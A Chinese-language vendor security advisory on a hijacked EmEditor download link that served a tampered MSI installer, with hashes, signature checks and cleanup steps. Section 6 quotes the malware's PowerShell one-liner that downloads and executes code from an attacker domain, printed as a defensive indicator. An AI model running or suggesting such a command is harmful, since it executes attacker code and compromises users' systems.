【重要】关于 EmEditor 安装程序下载链接的安全事件通知

/在: /通过:

感谢您使用 EmEditor。

我们非常遗憾地通知您:我们已确认 EmEditor 官方网站的下载路径([Download Now] 按钮)发生了一起事件,疑似遭到第三方未授权篡改。在受影响期间,通过该按钮下载的安装程序可能并非我们(Emurasoft, Inc.)提供的正版文件。

对此可能造成的担忧与不便,我们深表歉意。请阅读以下信息。

1. 可能受影响的期间

  • 2025 年 12 月 19 日 18:39 – 2025 年 12 月 22 日 12:50(美国太平洋时间)

如果您在上述期间通过 EmEditor 首页的 [Download Now] 按钮下载安装程序,则有可能下载到了一个没有我们数字签名的不同文件。这是保守估计;实际受影响时间可能更短,并且可能仅限于某一特定时间段。

2. 事件概要(深层原因)

[Download Now] 按钮正常情况下指向以下 URL:

  • https://support.emeditor.com/en/downloads/latest/installer/64

该 URL 使用了重定向。然而在受影响期间,重定向设置疑似被第三方更改,导致下载被从以下(错误)URL 提供:

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

该文件并非由 Emurasoft, Inc. 创建,并且已被移除

因此我们确认,下载到的文件数字签名可能不是我们,而是来自另一家名为 WALSHAM INVESTMENTS LIMITED 的组织。

注:此问题可能不限于英文页面,也可能影响其他语言的类似 URL(包括日文)。

3. 已确认可能受影响的文件

目前唯一确认涉及的文件为:

  • emed64_25.4.3.msi

正版文件(官方)

  • 文件名:emed64_25.4.3.msi
  • 大小:80,376,832 字节
  • 数字签名:Emurasoft, Inc.
  • SHA-256:e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

可疑文件(可能被篡改)

  • 文件名:emed64_25.4.3.msi
  • 大小:80,380,416 字节
  • 数字签名:WALSHAM INVESTMENTS LIMITED

4. 不受影响的情况

如果符合以下任一情况,则您不受影响

  • 通过 EmEditor 的 更新检查器(Update Checker) 或自动更新进行更新
  • 直接从 download.emeditor.info 下载
    示例:https://download.emeditor.info/emed64_25.4.3.msi
  • 下载的不是 emed64_25.4.3.msi 文件
  • 使用了 便携版(portable version)
  • 使用了 商店应用版本(store app version)
  • 使用 winget 安装/更新
  • 下载了文件但没有运行/执行

5. 如何检查以及应采取的措施

如果您可能在受影响期间通过 [Download Now] 下载了安装程序,请验证 emed64_25.4.3.msi 文件的数字签名SHA-256 哈希

5-1. 如何检查数字签名(Windows)

  1. 右键点击文件(emed64_25.4.3.msi),选择 属性(Properties)
  2. 打开 数字签名(Digital Signatures) 选项卡。
  3. 确认签名者为 Emurasoft, Inc.
  • 若显示 WALSHAM INVESTMENTS LIMITED,则该文件可能为恶意文件。

如果未显示“数字签名”选项卡,可能表示该文件未签名或签名无法识别。此时请勿运行该文件;删除并按下方指引处理。

5-2. 如何检查 SHA-256(Windows / PowerShell)

打开 PowerShell 并执行:

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

确认输出的 SHA-256 与下列一致:

  • 正版 SHA-256:e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

如果签名或 SHA-256 不匹配(建议措施)

如果数字签名不是 Emurasoft, Inc.(例如为 WALSHAM INVESTMENTS LIMITED)或 SHA-256 不匹配,则您可能获取了被篡改的文件(可能包含恶意软件)。

  • 立即将受影响电脑断开网络连接(有线/无线)
  • 对系统执行一次完整的恶意软件扫描
  • 视情况考虑刷新/重建包括操作系统在内的环境
  • 考虑凭据可能泄露:对该设备上使用/保存过的账号更改密码(并尽可能启用 MFA 多因素认证)

如果您在组织内使用 EmEditor,也建议联系内部安全团队(如 CSIRT),并尽可能保留相关日志。

6. 已观察到的行为(截至目前确认)

该可疑安装程序在执行时可能尝试运行以下命令。在任何情况下都不要运行该命令。

  • powershell.exe "irm emeditorjp.com | iex"

该命令会从 emeditorjp.com 下载并执行内容。
emeditorjp.com 并非 Emurasoft, Inc. 管理的域名。

另请注意:该安装程序可能仍会正常安装 EmEditor 并安装正版的 EmEditor 程序文件,这会使问题更难被察觉。

7. 当前状态与后续更新

我们将继续调查事实并确定影响范围。一旦有更多信息,我们会在本页面和/或通过官方渠道尽快更新。
我们高度重视此次事件,并将采取必要措施查明原因、避免再次发生。

对于此次事件可能造成的不便与担忧,我们再次致以诚挚歉意,并感谢您对 EmEditor 的理解与持续支持。